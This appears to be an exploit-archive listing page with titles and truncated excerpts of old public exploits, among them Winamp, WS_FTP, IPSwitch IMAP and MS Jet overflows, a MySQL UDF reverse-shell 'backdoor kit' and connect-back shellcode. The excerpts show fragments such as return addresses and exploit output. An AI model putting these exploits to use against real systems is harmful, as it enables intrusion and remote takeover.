Winamp 5.34 - .mp4 Code Execution

Winamp 5.34 - .mp4 Code Execution /\ Winamp = 5.34 .MP4 File Code Execution Winamp MP4's plugin fails to handle exceptional conditions, which can lead to code execution. However exploitation is hard, firstly because of the return address. This code exploits a call eax, and it might be complicated...

MySQL 4.x/5.0 User-Defined Function Command Execution Exploit (win)

No description provided by source. -- raptorwinudf.sql - A MySQL UDF backdoor kit for Windows -- Copyright c 2007 Marco Ivaldi [email protected] -- -- This is a MySQL backdoor kit for Windows based on the UDFs User Defined -- Functions mechanism. Use it to spawn a reverse shell netcat UDF on...

MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution

-- raptorwinudf.sql - A MySQL UDF backdoor kit for Windows -- Copyright c 2007 Marco Ivaldi -- -- This is a MySQL backdoor kit for Windows based on the UDFs User Defined -- Functions mechanism. Use it to spawn a reverse shell netcat UDF on port -- 80/tcp or to execute single OS commands exec UDF...

MySQL 4.x/5.0 User-Defined Function Command Execution Exploit (win)

Exploit for unknown platform in category remote exploits =================================================================== MySQL 4.x/5.0 User-Defined Function Command Execution Exploit win =================================================================== -- raptorwinudf.sql - A MySQL UDF...

Ipswitch WS_FTP LE 5.08 - PASV Response Remote Buffer Overflow

/ wsexp.c WSFTP LE 5.08 PASV response 0day buffer overflow exploit Coded by h07 Tested on XP SP2 Polish, 2000 SP4 Polish Example: C:\wsexp 1 192.168.0.1 4444 WSFTP LE 5.08 PASV response 0day buffer overflow exploit Coded by h07 + Listening on 21 + Connection accepted from 192.168.0.3 + Client...

barracudaExec.txt

Severity: High - Full system compromise possible Date: 04 August 2006 Discovered by: Matthew Hall [email protected] Credits for original discovery to Greg Sinclair Discovered on: 03 Aug 2006 Summary: Lack of input sanitisation in the Linux based Barracuda spam firewall web interface allows executio...

linux/x86 - SET_IP Connectback Shellcode 82 bytes

linux/x86 SETIP Connectback Shellcode 82 bytes. Shellcode exploit for linx86 platform /--------------------------------------------------------------------------- 82 byte Connectback shellcode by Benjamin Orozco - [email protected]...

IPSwitch IMAP Server - LOGON Remote Stack Overflow

IPSwitch IMAP Server - LOGON Remote Stack Overflow / IpSwitch IMAP Server LOGON stack overflow. Software Hole discovered by iDEFENSE POC written by nolimit and BuzzDee First, some information for the few of you that know how this stuff works. The reason you see no SP2 or 2003 offsets is because o...

IPSwitch IMAP Server LOGON Remote Stack Overflow

No description provided by source. / IpSwitch IMAP Server LOGON stack overflow. Software Hole discovered by iDEFENSE POC written by nolimit and BuzzDee First, some information for the few of you that know how this stuff works. The reason you see no SP2 or 2003 offsets is because of Windows SEH...

IPSwitch IMAP Server LOGON Remote Stack Overflow

Exploit for unknown platform in category remote exploits ================================================ IPSwitch IMAP Server LOGON Remote Stack Overflow ================================================ / IpSwitch IMAP Server LOGON stack overflow. Software Hole discovered by iDEFENSE POC written...

IPSwitch IMAP Server - LOGON Remote Stack Overflow

/ IpSwitch IMAP Server LOGON stack overflow. Software Hole discovered by iDEFENSE POC written by nolimit and BuzzDee First, some information for the few of you that know how this stuff works. The reason you see no SP2 or 2003 offsets is because of Windows SEH checks. Thats right, in this one...

yager524.txt

/ Yager 1 -- sending handshake UDP...done! -- reading server response UDP...done! -- server port: 1089 -- connecting to 192.168.2.100:1089 TCP...done! -- exploiting WinXP Pro SP1 GER -- ret: 0x300686bd jmp esp in binkw32.dll -- exploiting packet overflow... -- sending packet...done! -- starting...

Yager 5.24 - Remote Buffer Overflow

/ Yager 1 -- sending handshake UDP...done! -- reading server response UDP...done! -- server port: 1089 -- connecting to 192.168.2.100:1089 TCP...done! -- exploiting WinXP Pro SP1 GER -- ret: 0x300686bd jmp esp in binkw32.dll -- exploiting packet overflow... -- sending packet...done! -- starting...

MS Jet Database (msjet40.dll) Reverse Shell Exploit

Exploit for unknown platform in category local exploits =================================================== MS Jet Database msjet40.dll Reverse Shell Exploit =================================================== Microsoft Jet msjet40.dll Reverse Shell Exploit Based on the exploit written by S.Pears...

Microsoft Jet Database - msjet40.dll Code Execution (Reverse Shell) (2)

Microsoft Jet Database - msjet40.dll Code Execution Reverse Shell 2 Microsoft Jet msjet40.dll Reverse Shell Exploit Based on the exploit written by S.Pearson and Python version by coded by Tal zeltzer XP/sp2 fixed version by Jean Luc import sys import struct Addresses are compatible with Windows ...

Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)

Microsoft Jet msjet40.dll Reverse Shell Exploit Based on the exploit written by S.Pearson and Python version by coded by Tal zeltzer XP/sp2 fixed version by Jean Luc import sys import struct Addresses are compatible with Windows XP Service Pack 1 and Service Pack 2 EIP = "\x47\xAD\x05\x30"; Use...

msjet40.txt

See-security Technologies ltd. http://www.see-security.com Microsoft Jet msjet40.dll Reverse Shell Exploit coded by Tal zeltzer Based on the exploit written by S.Pearson import sys import struct Addresses are compatible with Windows XP Service Pack 1 ReturnAddress = 0x77F51B93 Address of "jmp edx...

Microsoft Jet Database - 'msjet40.dll' Reverse Shell (1)

See-security Technologies ltd. http://www.see-security.com Microsoft Jet msjet40.dll Reverse Shell Exploit coded by Tal zeltzer Based on the exploit written by S.Pearson import sys import struct Addresses are compatible with Windows XP Service Pack 1 ReturnAddress = 0x77F51B93 Address of "jmp edx...

MS Jet Database (msjet40.dll) Reverse Shell Exploit

Exploit for unknown platform in category local exploits =================================================== MS Jet Database msjet40.dll Reverse Shell Exploit =================================================== See-security Technologies ltd. http://www.see-security.com Microsoft Jet msjet40.dll...

Microsoft Jet Database - msjet40.dll Reverse Shell (1)

Microsoft Jet Database - msjet40.dll Reverse Shell 1 See-security Technologies ltd. http://www.see-security.com Microsoft Jet msjet40.dll Reverse Shell Exploit coded by Tal zeltzer Based on the exploit written by S.Pearson import sys import struct Addresses are compatible with Windows XP Service...